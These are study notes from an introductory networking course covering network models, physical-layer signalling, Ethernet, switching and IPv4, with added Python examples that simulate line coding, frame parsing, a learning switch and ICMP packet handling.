- Week 1
- IP Address
- IPv4 (32 bit), IPv6 (128 bit)
- Static (entered manually)
- DHCP (dynamic)
- ipconfig (Windows) shows your address
- College only uses IPv4
- A 169.254.x.x address is not a usable address; it is the link-local (APIPA) placeholder a host assigns itself while it is unable to get a real one from DHCP
- Network Models
- OSI Model
- Ideal
- 7. Application
- PDU: Data
- Defines rules (protocols) for applications to use the web
- Some Protocols include:
- HTTP, DNS, DHCP
- 6. Presentation
- Common representation of data to enable devices to communicate
- Some protocols include
- MPEG, QuickTime, JPEG
- 5. Session
- Organize dialogue and manage data exchanges
- 4. Transport
- PDU: Segment
- IP Address + Port Number = socket
- Takes apart and reassembles data segments
- Some protocols include
- TCP
- UDP
- 3. Network
- PDU: Packet
- IP address to exchange individual pieces of data over the network between identified end addresses
- Some protocols include
- IPv4, IPv6, IPX, Appletalk, ICMP
- Router is a layer 3 device
- 2. Data Link
- PDU: Frame
- Addressing is MAC address (physical)
- It exchanges data frames between end devices over common media
- Switches are a layer 2 device
- Some protocols include
- Ethernet, Token Ring, Wireless, Frame Relay
- 1. Physical
- PDU: Bit
- Transmission over the medium (copper, fibre, air waves)
- Repeater and hubs are layer 1 devices
- Cables
- UTP, STP, CAT5, etc
- Signalling, voltages, bandwidth
- TCP/IP Model
- What is actually implemented
- 4. Application
- 3. Transport
- 2. Internet
- 1. Network Access
- OSI | TCP/IP
- Application, Presentation, Session | Application
- Transport | Transport
- Network | Internet
- Data Link, Physical | Network Access
- Protocols
- Pre-established rules to communicate properly
- Technology independent: they don't care what technology they run over
- Each application has its own protocol
- Application layer (data)
- http, https, smtp, ftp, pop, dns, dhcp, VoIP
- Transport Layer (segments)
- TCP, UDP
- Internet Layer (packets)
- IPv4, IPv6, ICMP
- Network Access Layer (frames)
- Ethernet (LAN), PPP, Frame Relay (WAN), ARP
- Standards
- IETF
- Anything that is software tends to be these guys
- Layers 7 through 3 of OSI model
- IEEE
- Anything that is electrical tends to be these guys
- Addressing
- Layer 4 (transport layer – end devices)
- Port numbers for delivery to correct application.
- Layer 3 (Network Layer – routers)
- IP addresses for delivery of a message to the correct network
- IP addresses have the network and device address
- Layer 2 (Data Link Layer – switches)
- MAC address for delivery of a message to correct device within the same network
- Week 2
- Circuit Switched Networks
- Reserve dedicated channel for entire communication
- Think old telephone lines
- Inefficient use of resources and are not fault tolerant
- Packet Switched Networks
- No dedicated channel, it is all virtual
- Communications get broken into small pieces of data (segmented)
- Each packet may take a different route over the network; the packets are reassembled at the destination
- Seeks most efficient route over network
- In TCP can retransmit dropped packets
- It multiplexes (breaks up and orders data across medium to be sent out )
- Four Key characteristics of A Network
- Fault Tolerance
- If a cable or link fails, traffic is rerouted over another path or piece of hardware on the fly
- Scalable
- Can add more users, put more traffic, and expand without having to rebuild
- Quality of Service
- Guarantees certain levels of service
- Can buffer messages when network is congested
- Identify specific services to prioritize communication
- Security (CIA)
- Confidentiality
- Information is only revealed to the intended recipient
- Integrity
- Data arrives unaltered
- Availability
- Service must be available so must have alternate routes set up
- Logical versus Physical topology
- Physical
- Location of equipment, wires, end devices
- Logical
- Represent different information, how computers are connected, the networks they belong to
- Network Types
- LAN
- Network infrastructure that provides access to users
- Usually managed/owned by one organization
- High speed access
- WAN
- Network that provides access to other networks across far distances
- Third parties usually involved
- Connects LANs at slower speeds
- Home Network
- A home router bundles several devices into one box
- Switch (the wired LAN ports)
- Access point (for wireless signal)
- Router
- DHCP server
- Provisions IP addresses
- NAT
- Associates your private IP and port with the router's public IP and a port
- Translates private addresses to public
- Only the public internet IP is known to outside networks; all private sockets are hidden
- The router keeps a table mapping each internal IP and port to the external IP and port it used, so replies can be sent back to the right host
- Nested infrastructures
- Internet
- Worldwide collection of interconnected networks
- Extranet
- Computer network that allows controlled access to specific authorized users
- Intranet
- Often used for private connection of LANs and WANs
- Usually employees or tied to the organization somehow
- Encapsulation/De-encapsulation
- Encapsulation
- Process of preparing data for sending
- Adds layer specific header/addressing information
- Each layer of the TCP/IP model has its own specific addressing information
- Data > Segment > Packet > Frame > Bit
- Think KFC
- Chicken (data), pieces cut up (segments), the bucket (packet), the plate (frame), the bite on your fork (bit) that's totally finger licking good
- De-encapsulation
- Process received data
- Each layer examines the specific tag and passes up to next layer
- Original data is reassembled
- TCP/IP Protocols
- Segmentation of messages into small pieces
- Reassembly of messages at the destination
- Connection establishment and tear down for TCP communication
- Flow control for TCP communication
- Lab 2
- Simplex
- Communication over network that is one-way only
- Example: broadcast radio
- Half-Duplex
- Two-way communication but must take turns
- Example: Walkie talkie
- Full-Duplex
- Full two-way communication
- Example: Modern Ethernet
- Framing
- Taking a piece of information from the upper layer and encapsulating it with layer specific information
- Protocols
- Pre-established rules that govern communication
- Point-to-point connection
- Communication between two nodes and endpoints (two end devices)
- Point-to-multipoint connection
- Communication between one node to many
- Attenuation
- The farther you are from the source the weaker the signal, so the line noise makes up a bigger share of what the receiver sees
- Lab 3
- Cables
- Straight-through cables
- Use for switch to router
- Computer to switch
- Computer to hub
- Crossover cable
- Switch to switch
- Switch to hub
- Hub to hub
- Router to router
- How to get to network settings
- Start > Run > ncpa.cpl
- Wireshark
- Capture Options choose interface
- Top Pane
- Packet list
- Middle pane
- Packet Details
- Lower Pane
- Packet bytes
- ICMP
- Ping format (echo request is type 8, echo reply is type 0)
- Type
- Identifies the message; types run from 0 (echo reply) to 16 (information reply)
- Code
- Qualifies the type and says what happened, e.g. for destination unreachable (type 3) the codes run from 0 (net unreachable) to 12 (destination host unreachable for type of service)
- Checksum
- Eagle Server
- Virtual machine running as a server
- Eagle server to router
- Straight through
- Router to router
- Cross over
- Week 3
- Layer 1. Physical Layer
- Terminology
- Analog Signal
- Continuous, no breaks or interruptions
- Digital Signal
- Not continuous: discrete levels, each approximating the bit value it represents
- ASCII
- American Standard code for Information Interchange
- A 7-bit code, so only 128 different values (8-bit extended variants reach 256)
- UTF-8
- Replaced it as it is now the multilingual standard
- Bit (b)
- Basic unit of information it is a 0 or 1
- Byte (B)
- Also known as an octet
- It is the most common unit of data
- Digital Transmission
- Physical transfer of data over point-to-point or point-to-multipoint communication
- Copper, optical, or wireless transmission
- The message is represented via a sequence of pulses representing a 0 or 1
- Modulation
- Process of varying one or more properties of periodic waveforms
- Takes the information you want to send (digital bits or an analog signal) and impresses it on a carrier wave so it can be conveyed to another device
- There are several ways in doing this
- PSK (phase-shift keying)
- Digital modulation that changes the phase of a reference signal (carrier wave)
- I have no idea
- FSK (frequency-shift keying)
- Frequency modulation is encoding information by varying the frequency of the wave
- ASK (amplitude-shift keying)
- Varying the strength of the carrier in proportion to the waveform being sent
- QAM (quadrature amplitude modulation)
- Combines two shift keys
- Line code
- A line code is the digital baseband signalling scheme chosen for baseband transmission (how 1s and 0s are put on the wire)
- Ethernet uses line codes (Manchester for 10BASE-T, 4B5B for 100BASE-TX)
- Carrier Signal
- Carrier is a waveform that is modulated with an input signal to convey information
- Carrier is to transmit information through space
- it is much higher in frequency than the input signal
- input signal (what you want to transmit) + carrier (type of transmission) = modulated signal (signal sent modulated over media)
- Keying
- Modulation forms where modulating signal takes one of a specific number of values at all times
- Modem
- Modulator-demodulator
- Modulates signals to encode digital information and demodulates signals to decode to transmitted information
- Bit rate (b/s)
- Bits over a unit of time
- Symbol rate (baud rate, Bd)
- Number of symbol changes made to the transmission medium per second using a digitally modulated signal or line code
- Symbol rate is measured in baud
- L = 2^n, where n is the number of bits per symbol and L is the number of distinct symbol values
- So a signal with 8 symbol values (L = 8) carries 3 bits per symbol (000 to 111 gives 8 possible values)
- Bit rate = symbol rate x bits per symbol; baud and bit/s are only equal when each symbol carries one bit
- Baseband
- Baseband signals are transmitted without modulation
- No shift in the range of frequencies of the signal
- This is how LANs (local area networks) work: over short distances attenuation is low enough that modulation onto a carrier is not needed
- Digital baseband transmission
- Line coding
- Aims to transfer a digital bit stream
- Broadband
- Wide bandwidth data transmitted over multiple signals and traffic types simultaneously
- Can do so over different “channels”
- Payload
- The cargo that you want to transmit
- Bandwidth
- The capacity of a medium to carry data. This is the raw data in ideal situations
- Throughput
- Measure of the transfer of bits across the media over a given amount of time
- This takes into account traffic and distance
- Goodput
- Measure of usable data transferred over given time
- Takes into account all the application processing, encapsulation, etc
- Compression
- Lossy
- Inexact approximations of data
- Used to reduce time data takes to send and assemble
- Lossless
- Original data is reconstructed exactly
- Synchronization
- Devices must be able to accurately interpret 0s and 1s so there’s two ways of sending the clock to synchronize
- Asynchronous
- Two clocks
- Synchronous
- One clock
- Clock is embedded with data
- Manchester
- Return to Zero
- 4B5B
- Data Rate Limits
- Shannon capacity C
- Bit rate = C = B * log2(1 + SNR), where B is the bandwidth in Hz and SNR is the linear signal-to-noise ratio
- Nyquist bit rate
- Bit rate = 2 * B * log2(L), where L is the number of signal levels
- Physical Layer Tasks
- Takes frame from Data Link Layer
- Sees the frames as bits, not structure
- Represents bits as signals and sends them to the media
- Encoding and Signalling
- NRZ (Non-return to zero)
- Very simple 1 is high, 0 is low
- Voltage does not return to zero
- Problems
- Long string of 0s or 1s can cause sync errors
- Problems with interference
- Manchester
- Voltage changes in the middle of each bit period
- Rising means 1, falling means 0
- Change between period is ignored
- The transition matters, not the voltage
- Not efficient for higher speeds
- Fast Ethernet
- 100BaseT
- Coding 4B5B
- Bits are grouped then coded
- 4 bit to 5 bit
- Each possible 4 bit pattern as its own code
- Extra bits for error transmission or start/end transmissions
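The encoding schemes in this section, as an added example that is not part of the course notes: NRZ, Manchester and 4B/5B coded in Python so the properties described above can be checked directly. It shows that NRZ can run for many bit times without a transition (nothing for the receiver to recover its clock from), that Manchester puts a transition in the middle of every bit, and that 4B/5B bounds the run of zeros so the physical layer still sees regular transitions. The input bytes are constructed sample data.

```python
# Added example (not part of the course notes): NRZ vs Manchester line coding and
# 4B/5B block coding. The input bytes are constructed sample data.

def bits_from_bytes(data: bytes) -> list:
    """Most-significant bit first, as a list of 0/1."""
    return [(b >> i) & 1 for b in data for i in range(7, -1, -1)]

def nrz_encode(bits) -> list:
    """NRZ-L: one voltage level per bit period, 1 = high, 0 = low."""
    return list(bits)

def manchester_encode(bits) -> list:
    """Two half-bit levels per bit. IEEE 802.3 convention: 0 = high-to-low, 1 = low-to-high."""
    levels = []
    for b in bits:
        levels += [0, 1] if b else [1, 0]
    return levels

def manchester_decode(levels) -> list:
    """The mid-bit transition carries the data; a missing transition is a coding violation."""
    bits = []
    for i in range(0, len(levels), 2):
        first, second = levels[i], levels[i + 1]
        if first == second:
            raise ValueError("no mid-bit transition in symbol %d" % (i // 2))
        bits.append(1 if (first, second) == (0, 1) else 0)
    return bits

def longest_run(levels, value) -> int:
    """Longest run of consecutive 'value' levels: the sync-loss risk the notes mention for NRZ."""
    best = run = 0
    for lv in levels:
        run = run + 1 if lv == value else 0
        best = max(best, run)
    return best

# 4B/5B code groups used by 100BASE-TX and FDDI. Every group has at most one leading 0
# and at most two trailing 0s, so any concatenation has at most three 0s in a row.
# The unused 5-bit patterns are the control symbols (idle, start/end of stream, errors).
FOUR_B_FIVE_B = {
    0x0: "11110", 0x1: "01001", 0x2: "10100", 0x3: "10101",
    0x4: "01010", 0x5: "01011", 0x6: "01110", 0x7: "01111",
    0x8: "10010", 0x9: "10011", 0xA: "10110", 0xB: "10111",
    0xC: "11010", 0xD: "11011", 0xE: "11100", 0xF: "11101",
}
FIVE_B_FOUR_B = {code: nibble for nibble, code in FOUR_B_FIVE_B.items()}

def encode_4b5b(data: bytes) -> str:
    """High nibble first; each 4-bit nibble becomes its 5-bit code group."""
    return "".join(FOUR_B_FIVE_B[n] for b in data for n in (b >> 4, b & 0xF))

def decode_4b5b(code: str) -> bytes:
    """Inverse mapping; a 5-bit group not in the table is a control symbol or an error."""
    nibbles = []
    for i in range(0, len(code), 5):
        group = code[i:i + 5]
        if group not in FIVE_B_FOUR_B:
            raise ValueError("invalid or control code group %s" % group)
        nibbles.append(FIVE_B_FOUR_B[group])
    return bytes((nibbles[i] << 4) | nibbles[i + 1] for i in range(0, len(nibbles), 2))

def max_zero_run_4b5b(data: bytes) -> int:
    return longest_run([int(c) for c in encode_4b5b(data)], 0)

if __name__ == "__main__":
    quiet = bytes(8)   # 64 zero bits: the worst case for NRZ clock recovery
    print("NRZ longest 0 run:", longest_run(nrz_encode(bits_from_bytes(quiet)), 0))
    print("Manchester longest 0 run:", longest_run(manchester_encode(bits_from_bytes(quiet)), 0))
    print("4B/5B longest 0 run over all bytes:", max(max_zero_run_4b5b(bytes([b])) for b in range(256)))
```

Run it and compare the three "longest 0 run" values: 64 for NRZ, 1 for Manchester and 3 for 4B/5B, which is the whole reason the later schemes exist.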
- Coaxial Cable
- Central conductor > insulation > copper braid shield > outer jacket
- Think TV cable
- Pros
- High frequency radio/video signals
- Used for antennas and cable TV
- Formerly used in Ethernet LANs but UTP was cheaper and more efficient
- UTP Cable
- Unshielded Twisted Pair
- 8 wires twisted together into 4 pairs with an outer jacket
- Commonly used for Ethernet LANs
- RJ45 Connectors is what is usually used for Ethernet
- Straight through
- Connect devices of different types
- Crossover
- Connect devices of same type
- STP (Shielded Twisted Pair)
- Wires are shielded against noise
- Much more expensive than UTP
- Used for 10Gbps Ethernet
- Copper
- Signals are affected by
- Attenuation
- Signals lose strength as it travels
- Noise
- Electrical signals on copper
- Electromagnetic (EMI)
- Radio Frequency
- Crosstalk (from other wires)
- Mitigating noise
- Metal shielding around cables
- Twisting pair of wires cancels effects
- Avoid areas of problem
- Careful termination
- Incorrect installation
- Could become lightning rod for noise
- Incorrect termination
- UTP length
- Cannot exceed 100M in total length
- Permanent cable cannot exceed 90m
- Gives 10m for patch cables at work area
- Fibre Optic
- Uses light signals for 1s and 0s
- Two technologies
- Single Mode
- More expensive
- Uses laser for transmitting
- Convert light to electricity
- Up to 100KMs
- Multimode
- Less expensive
- Uses LED
- Convert light to electricity
- Few KM distance
- No RFI/EMI noise problems
- Full duplex requires two fibre strands
- Wireless
- Electromagnetic signals at radio and microwave frequencies
- No cost of installing cables
- Hosts free to move around
- Lab 4
- Ethernet
- Most common LAN technology
- Different media
- Copper cable, optical fibre
- Ethernet Frame
- Frame Header
- Preamble | Start of frame delimiter | Destination Address | Source Address | Length/Type | Data (packet) | Frame Check Sequence
- Timing and start | Addresses | Layer 3 protocol | Packet | Check and stop
- Frame Trailer
- FCS for error detection, marks the end of the frame
- Frame Fields
- Preamble
- Wake up call
- Help synchronization and show where frame starts
- Destination
- MAC address of destination
- Source
- MAC address of sender
- Length/type
- Length of packet
- Type
- 0800 IPv4
- 0806 ARP
- 86DD IPv6
- Data
- Layer 3 protocol data unit (usually IP)
- If packet is less than 46 bytes padding is applied
- Trailer
- FCS, CRC information for corrupt frames
- Ethernet
- MAC address is unique to every NIC
- Burned into ROM but copied into RAM
- First three bytes identify the manufacturer
- Organizationally Unique Identifier (OUI)
- This is the physical address per se
- Switch reads destination MAC to forward the frame
- It is 12 hex digits
- MAC is 48 bits
- Unicast, Multicast, broadcast
- Unicast
- Message for one particular host
- Broad cast
- FF:FF:FF:FF:FF:FF. All hosts on the network
- Multicast
- For a group of devices
- Address Resolution Protocol (ARP)
- Allows a device to discover the MAC addresses on the same-subnet
- ARP requests do not pass the router
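The Ethernet frame fields, MAC address types and FCS from Lab 4, as an added example that is not part of the lab notes: Python code that builds an Ethernet II frame, parses it back, classifies the destination MAC (unicast, multicast or broadcast), extracts the OUI and verifies the trailer. The FCS is the IEEE 802.3 CRC-32, which uses the same polynomial and bit order as zlib.crc32 and is appended least significant byte first. The preamble and SFD are left out because the NIC strips them before the frame reaches software. All frame contents are constructed samples.

```python
# Added example (not part of the lab notes): build and parse an Ethernet II frame,
# classify the destination MAC, extract the OUI and verify the FCS.
import struct
import zlib

ETHERTYPES = {0x0800: "IPv4", 0x0806: "ARP", 0x86DD: "IPv6"}
MIN_FRAME_NO_FCS = 60       # 64-byte minimum legal frame minus the 4-byte FCS
BROADCAST = b"\xff" * 6

def mac_to_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))

def bytes_to_mac(b: bytes) -> str:
    return ":".join("%02x" % x for x in b)

def fcs(frame_without_fcs: bytes) -> bytes:
    """IEEE 802.3 CRC-32 over destination..data, transmitted little-endian."""
    return struct.pack("<I", zlib.crc32(frame_without_fcs) & 0xFFFFFFFF)

def build_frame(dst: str, src: str, ethertype: int, payload: bytes) -> bytes:
    body = mac_to_bytes(dst) + mac_to_bytes(src) + struct.pack("!H", ethertype) + payload
    if len(body) < MIN_FRAME_NO_FCS:
        # data shorter than 46 bytes is padded, as the notes say, so the frame reaches 64 bytes
        body += bytes(MIN_FRAME_NO_FCS - len(body))
    return body + fcs(body)

def classify_mac(mac: bytes) -> str:
    if mac == BROADCAST:
        return "broadcast"
    # I/G bit: least significant bit of the first octet, 1 = group (multicast) address
    return "multicast" if mac[0] & 0x01 else "unicast"

def parse_frame(frame: bytes) -> dict:
    if len(frame) < MIN_FRAME_NO_FCS + 4:
        raise ValueError("runt frame of %d bytes, dropped as a collision fragment" % len(frame))
    body, trailer = frame[:-4], frame[-4:]
    dst, src = body[:6], body[6:12]
    ethertype = struct.unpack("!H", body[12:14])[0]
    return {
        "dst": bytes_to_mac(dst), "dst_kind": classify_mac(dst),
        "src": bytes_to_mac(src), "src_oui": bytes_to_mac(src[:3]),
        # U/L bit (second-lowest bit of the first octet) is set on locally assigned,
        # i.e. software-chosen, MACs rather than manufacturer-burned ones
        "src_locally_administered": bool(src[0] & 0x02),
        "ethertype": ETHERTYPES.get(ethertype, "0x%04x" % ethertype),
        "payload": body[14:],
        "fcs_ok": fcs(body) == trailer,      # a mismatch means the frame is corrupt and is dropped
    }

if __name__ == "__main__":
    arp = build_frame("ff:ff:ff:ff:ff:ff", "00:1c:b3:01:02:03", 0x0806,
                      b"\x00\x01\x08\x00\x06\x04\x00\x01")
    print(len(arp), parse_frame(arp))
```

The src_locally_administered flag is worth watching in captures: a burned-in address has that bit clear, so a frame whose source has it set came from a virtual interface or a MAC someone chose by hand.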
- Week 4
- Layer 2
- At each hop a new media dependent frame is created while the original packet is unchanged
- Each router is a hop
- The PDU is frame
- Most widely used Layer 2 Standard – Ethernet
- Layer 2 is about delivery of messages between devices connected to the same network segment
- Its primary function is to move messages throughout the network to their intended destination using the MAC addresses
- Media
- Copper, fibre, wireless
- Deals with MAC addresses
- Switch is a layer 2 device
- Forward frames only to destination
- Fewer collisions and more bandwidth per port
- Every port has its own bandwidth (every port is its own collision domain)
- Hub is a layer 1 device
- Receives a bit and retransmit the frame to all outgoing ports
- One collision domain
- Wireless access point is a layer 2 device
- Bridge is a layer 2 device
- Layer 2 Services
- Links upper layers (Network and Transport) to Physical media
- Logical link control (LLC)
- Upper sublayer: talks to the network layer and identifies which Layer 3 protocol is carried in the frame
- Provides flow control and error notification between the upper layers and the media
- Media Access control (MAC)
- Lower sublayer: sets up the frame header and trailer to encapsulate the packet, adds the Layer 2 addresses, marks the start and end of the frame
- Controls the hardware at the Physical layer
- Detects (and in some technologies corrects) errors in transmission using the frame check sequence
- Process of controlling when nodes (end devices) can transmit on the physical media
- Layer 2 supports logical topologies
- Network Topology
- Logical (Data Link)
- Represent how data link layer sees other devices
- Physical
- Represents how devices are physically inter-connected
- Point-to-point
- End device - network medium - end device
- Multi-Access
- A data-bus (think Christmas lights) with nodes connecting to it
- Contention based (collisions)
- Controlled (high overhead)
- Ring
- A ring of nodes connected to one another
- Protocol and standards
- IEEE 802 (covers all of these)
- 802.2 Logical Link Control
- 802.3 Ethernet (probably key to remember)
- 802.5 Token Ring
- 802.11 Wi-Fi (probably key to remember)
- Media Independence
- Data Link layer handles the media on behalf of the Upper Layers
- It is what bridges hardware and software
- Multi-Access Topology
- Contention Based (collisions)
- No control at all would cause frames to be corrupted due to collisions
- Examples
- Ethernet
- Trailer is the frame check sequence
- CRC is cyclic redundancy check
- Foot print of frame
- First thing device does is that it verifies CRC
- If matches there was no corruption
- Wireless
- Controlled (high overhead)
- Must use ways to prevent collisions
- Examples
- Token Ring, FDDI
- The Frame
- For Ethernet: See Lab 4
- Wi-Fi Frame
- Preamble | PLCP Header | MPDU (MAC PDU)
- MPDU: Frame Control | Duration/ID | Address 1 | Address 2 | Address 3 | Sequence Control | Address 4 | Frame Body | FCS
- LAN wireless protocol
- Fragile environment
- A lot of collisions
- Every transmission needs to be acknowledged
- Un acknowledged frames are retransmitted
- Lots of control mechanisms in frame
- CSMA/CD
- Host does not know about the line being in use
- Many collisions are the result of delays as it takes time for signals to travel
- If no carrier is sensed the host transmits, but a frame another host has just put on the wire may not have reached it yet
- Used only for Ethernet
- Smallest legal byte size on frame is 64
- Anything less will be dropped thinking it was merely a fragment from collisions
- Listens before transmitting
- If signal is detected it will wait and return to listen
- If no signal is detected it will transmit then listen for collisions
- After a collision each host sends a jam signal and waits a random time before retrying: the backoff algorithm
- CS
- Carrier sense
- Listen to see if signals are on cable
- MA
- Multiple access
- Hosts share same cable
- CD
- Collision detection
- Collision domain
- Hub
- is essentially “one wire” so every interface of a hub is considered one collision domain
- Forwards frames through all ports except incoming
- Switch
- Every port on a switch is its own collision domain
- Forwards frames only to the destination once address is known
- A switch has five functions
- Selective forwarding
- Through its switching table
- Maps MAC addresses to switch ports (not IPs)
- Learning
- Learns addresses as they become known
- Flooding
- Sends the frame out every port except the incoming one if it doesn't know the destination
- Aging
- Deletes addresses not in use over a time
- Filtering
- Drops frames that don't need forwarding, e.g. a frame whose destination is on the same port it came in on
- With port security, a port configured with "only allowed" addresses only accepts frames from those source MACs (all addresses are MACs)
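The five switch functions above, as an added example that is not part of the notes: a small software model of a learning switch in Python that does selective forwarding, learning, flooding, aging and filtering against a MAC-to-port table. Timestamps are passed in by the caller so the aging rule can be exercised without waiting; the MACs, port numbers and the allow-list are constructed sample data.

```python
# Added example (not part of the notes): a learning switch model with the five
# functions listed in the notes. MACs, ports and timestamps are constructed samples.

class LearningSwitch:
    def __init__(self, ports, aging_seconds=300, allowed=None):
        self.ports = list(ports)
        self.aging = aging_seconds
        self.table = {}               # mac -> (port, last_seen); MAC to port, never IP
        self.allowed = allowed or {}  # port -> set of MACs (port security / filtering)

    def age_out(self, now):
        """Aging: forget entries that have not been seen within the aging time."""
        expired = [m for m, (_, seen) in self.table.items() if now - seen > self.aging]
        for m in expired:
            del self.table[m]
        return expired

    def receive(self, in_port, src, dst, now):
        """Process one frame; returns the list of ports it is sent out of."""
        self.age_out(now)
        # filtering (port security): a port with an allow-list drops frames from other sources
        if in_port in self.allowed and src not in self.allowed[in_port]:
            return []
        # learning: the source MAC is now known to live behind in_port. The switch trusts
        # the source field as-is, which is why a frame with a spoofed source moves the entry.
        self.table[src] = (in_port, now)
        if dst == "ff:ff:ff:ff:ff:ff" or dst not in self.table:
            # flooding: broadcast or unknown unicast goes out every port except the incoming one
            return [p for p in self.ports if p != in_port]
        out_port = self.table[dst][0]
        # selective forwarding: a known destination goes only to its port;
        # a frame whose destination is on the incoming port is filtered (dropped)
        return [] if out_port == in_port else [out_port]

if __name__ == "__main__":
    sw = LearningSwitch(ports=[1, 2, 3, 4])
    a, b = "00:00:00:00:00:0a", "00:00:00:00:00:0b"
    print(sw.receive(1, a, b, now=0))   # b unknown: flooded to [2, 3, 4]
    print(sw.receive(2, b, a, now=1))   # a learned on port 1: forwarded to [1]
    print(sw.receive(1, a, b, now=2))   # b learned on port 2: forwarded to [2]
```

Note the comment at the learning step: the table is updated from whatever source MAC arrives, so an entry can be moved to another port by a frame that simply claims that source. That is the behaviour the filtering (port security) function is there to constrain.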
- Router
- Each router interface is a separate network, and therefore a separate collision domain and broadcast domain (a Layer 3 switch does the same job in hardware)
- CRC
- Is checked by each Layer 2 device along the path
- Hub: not checked (a hub only repeats bits)
- Switch: checked once, on receipt
- Router: checked on the incoming frame, then recomputed for the new frame it builds on the outgoing interface
- Lab 6
- IP
- Internet protocol
- ICMP
- Ping
- TTL
- Time-to-live
- For the IP packet it is a number
- TTL decrements at each hop (router)
- When it hits zero packet is dropped
- Prevents indefinite forwarding
- Router
- Sole purpose is to pass traffic from one network to another
- Connects two networks together
- Four types of routes
- Dynamic
- Learns on the fly
- Static
- Never changes
- Default
- Default gateway
- If no addresses are known will send traffic out this route
- Directly Connected
- Wired to router
- Arp cache
- Maps IP addresses to MAC addresses
- Week 7
- Layer 3 Network / Internet Layer
- Layer 3 Role
- Provide addressing scheme to identify networks/individual hosts
- Encapsulate segment from layer 4 into a packet
- Direct packets through the network
- De-encapsulate and give it to layer 4
- Layer 3 protocols
- IPv4
- Most common
- IPv6
- Successor of IPv4
- ICMP (ping)
- IP characteristics
- Designed with low overhead for speed
- Connectionless (does not wait for acknowledgement)
- Best effort (similar to UDP)
- Independent of media
- Layer 3 Encapsulation
- Segment is encapsulated with an IP header (IP has no trailer)
- Packet routing
- Responsible for sending to other routers
- IPv4 Header Fields (layout)
- Byte 1 | Byte 2 | Byte 3 | Byte 4
- Version, IHL | Type of Service | Total Length
- Identification | Flags, Fragment Offset
- Time to Live | Protocol | Header Checksum
- Source Address
- Destination Address
- Options | Padding
- IPv4 Header Fields
- Source and destination IP which is 32 bit
- Destination address
- Time to live
- Protocol
- Which protocol is being used
- Type of Service (Quality of Service)
- Prioritizes traffic
- Header Checksum
- Checking to see if the header has been corrupted
- Flags
- Control fragmentation: Don't Fragment and More Fragments bits
- Version
- IPv4 or IPv6
- Header length
- Packet length
- Including the header
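The IPv4 header fields above, the ICMP type/code/checksum format from Lab 3 and the TTL rule from Lab 6, as an added example that is not part of the notes: Python code that builds an IPv4 packet carrying an ICMP echo request, parses both headers back, verifies both checksums, and then does what a router does at each hop (decrement TTL, recompute the header checksum, drop when TTL runs out). The addresses and payload are constructed sample data.

```python
# Added example (not part of the notes): build, parse and checksum an IPv4 header
# carrying an ICMP echo request, then forward it hop by hop. Addresses and payload
# are constructed samples.
import struct

def internet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum of 16-bit words; shared by IPv4, ICMP, TCP and UDP."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def ip_to_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))

def bytes_to_ip(b: bytes) -> str:
    return ".".join(str(x) for x in b)

def build_icmp_echo(ident: int, seq: int, payload: bytes) -> bytes:
    # type 8 = echo request, code 0; the checksum covers the whole ICMP message
    hdr = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    csum = internet_checksum(hdr + payload)
    return struct.pack("!BBHHH", 8, 0, csum, ident, seq) + payload

def build_ipv4(src: str, dst: str, payload: bytes, ttl: int = 64, proto: int = 1) -> bytes:
    version_ihl = (4 << 4) | 5           # IPv4, IHL = 5 words = 20-byte header, no options
    total_len = 20 + len(payload)
    ident, flags_frag = 0x1234, 0x4000   # DF flag set, fragment offset 0
    hdr = struct.pack("!BBHHHBBH4s4s", version_ihl, 0, total_len, ident, flags_frag,
                      ttl, proto, 0, ip_to_bytes(src), ip_to_bytes(dst))
    hdr = hdr[:10] + struct.pack("!H", internet_checksum(hdr)) + hdr[12:]  # checksum at bytes 10-11
    return hdr + payload

def parse_ipv4(pkt: bytes) -> dict:
    (version_ihl, tos, total_len, ident, flags_frag, ttl, proto, csum,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (version_ihl & 0x0F) * 4
    return {
        "version": version_ihl >> 4, "ihl": ihl, "tos": tos, "total_len": total_len,
        "id": ident, "df": bool(flags_frag & 0x4000), "mf": bool(flags_frag & 0x2000),
        "frag_offset": flags_frag & 0x1FFF, "ttl": ttl, "proto": proto,
        "checksum_ok": internet_checksum(pkt[:ihl]) == 0,   # a valid header sums to zero
        "src": bytes_to_ip(src), "dst": bytes_to_ip(dst), "payload": pkt[ihl:total_len],
    }

def parse_icmp(msg: bytes) -> dict:
    typ, code, csum, ident, seq = struct.unpack("!BBHHH", msg[:8])
    return {"type": typ, "code": code, "id": ident, "seq": seq,
            "checksum_ok": internet_checksum(msg) == 0, "payload": msg[8:]}

def forward_hop(pkt: bytes):
    """One router hop: drop on bad checksum or expiring TTL, else TTL-1 and re-checksum."""
    fields = parse_ipv4(pkt)
    if not fields["checksum_ok"] or fields["ttl"] <= 1:
        return None
    ihl = fields["ihl"]
    hdr = bytearray(pkt[:ihl])
    hdr[8] -= 1                        # TTL is byte 8 of the header
    hdr[10:12] = b"\x00\x00"
    hdr[10:12] = struct.pack("!H", internet_checksum(bytes(hdr)))
    return bytes(hdr) + pkt[ihl:]

if __name__ == "__main__":
    pkt = build_ipv4("192.168.15.100", "192.168.15.1", build_icmp_echo(1, 1, b"abcdefgh"), ttl=2)
    print(parse_ipv4(pkt))
    print(parse_icmp(parse_ipv4(pkt)["payload"]))
    hop1 = forward_hop(pkt)
    print("after hop 1, TTL =", parse_ipv4(hop1)["ttl"], "; after hop 2:", forward_hop(hop1))
```

The checksum only detects corruption of the header, as the notes say; it is not a security control, since anyone who changes a field can recompute it, exactly as forward_hop does for the TTL.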
- Splitting up networks
- Too large to manage efficiency so break it up
- Too much broadcast traffic causes congestion
- Too many addresses for switch to remember
- Lack of security
- Splitting up the networks – how?
- Geographically
- Different sites
- Purpose
- What software is shared between organizations
- Ownership
- Different companies or departments on their own server
- IPv4 Address Anatomy
- Hierarchical addresses
- 32 bits
- 4 octets
- Written in decimal format
- The network part identifies the network, the host part identifies the device
- Prefix mask says how many bits represent network
- Length of network can vary
- Anatomy of a Subnet Mask
- Subnet mask
- 32 bits
- 1s indicate network bits
- 0s indicate host bits
- Mask is always from left to right
- Default Gateway
- Each PC is configured with an IP address and default gateway
- The default gateway is the IP address of the router interface on the same network as the PC
